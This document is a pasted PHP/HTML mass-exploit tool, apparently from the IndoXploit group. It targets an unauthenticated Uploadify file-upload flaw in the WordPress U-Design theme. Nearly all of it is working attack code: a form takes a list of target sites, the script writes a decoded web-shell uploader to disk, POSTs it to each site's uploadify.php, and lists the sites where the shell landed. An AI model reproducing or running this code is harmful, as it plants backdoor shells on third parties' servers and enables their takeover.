AgusSR

WordPress U-Design Themes Uploadify Mass Xploiter

Apr 24th, 2016
  1. <html>
  2. <center>
  3. <form method="post" enctype="multipart/form-data">
  4. Shellname: <br><input type="text" name='filename' style='width: 500px;' height="10" value='indoxploit.php' required><br>
  5. Target: <br><textarea name="url" style="width: 500px; height: 200px;" placeholder="http://www.target.com/"></textarea><br>
  6. <input type='submit' name='exp' value='Hajar!' style='width: 500px;'>
  7. </form>
  8. <?php
  9. // IndoXploit
  10. set_time_limit(0);
  11. error_reporting(0);
  12.  
  13. function buffer() {
  14.     ob_flush();
  15.     flush();
  16. }
function curl($url, $payload) {
    // POST $payload to $url and return the response body. curl_exec() returns
    // false on a transport failure, and with error_reporting(0) at the top of
    // the file nothing is logged, so the caller only sees a falsy value.
    // An array $payload is sent as multipart/form-data.
    $ch = curl_init();
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
          curl_setopt($ch, CURLOPT_URL, $url);
          curl_setopt($ch, CURLOPT_POST, true);
          curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
          // Cookies persist in cookie.txt relative to the process's current
          // working directory and are shared across every request the script makes.
          curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
          curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
          curl_setopt($ch, CURLOPT_COOKIESESSION, true);
          // Certificate and hostname validation are both disabled: the TLS peer
          // is not authenticated, so an on-path party can read or alter the
          // exchange. cek() below leaves verification at the library default.
          curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
          curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
          curl_setopt($ch, CURLOPT_HEADER, 0);
          // The User-Agent is copied from the browser that requested this page;
          // the key is unset (null) when the script is run from the CLI.
          curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
          curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    $res = curl_exec($ch);
          curl_close($ch);
    return $res;
}
function cek($url) {
    // GET $url, following redirects, and return the body or false if the
    // transfer fails. Unlike curl() above, TLS verification is left at the
    // library default (enabled), so an https URL with an invalid certificate
    // yields false here even when the POST in curl() went through. The caller
    // passes the result straight to preg_match(), where false is treated as "".
    $ch = curl_init();
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
          curl_setopt($ch, CURLOPT_URL, $url);
          curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    $res = curl_exec($ch);
          curl_close($ch);
    return $res;
}
  44. $file = htmlspecialchars($_POST['filename']);
  45. $site = explode("\r\n", $_POST['url']);
  46. $do = $_POST['exp'];
  47. $uploader = base64_decode("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");
  48. if($do) {
  49.     $idx_dir = mkdir("indoxploit_tools", 0755);
  50.     $shell = "indoxploit_tools/".$file;
  51.     $fopen = fopen($shell, "w");
  52.     fwrite($fopen, $uploader);
  53.     fclose($fopen);
  54.     foreach($site as $url) {
  55.         $target = $url.'/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php';
  56.         $data = array(
  57.             "Filedata" => "@$shell"
  58.             );
  59.         $curl = curl($target, $data);
  60.         if($curl) {
  61.             $cek = cek($url.'/'.$file);
  62.             if(preg_match("/IndoXploit/i", $cek)) {
  63.                 echo "<a href='$url/$file' target='_blank'>$url/$file</a> -> shellmu<br>";
  64.             }
  65.         }
  66.     buffer();
  67.     }
  68. }
  69. ?>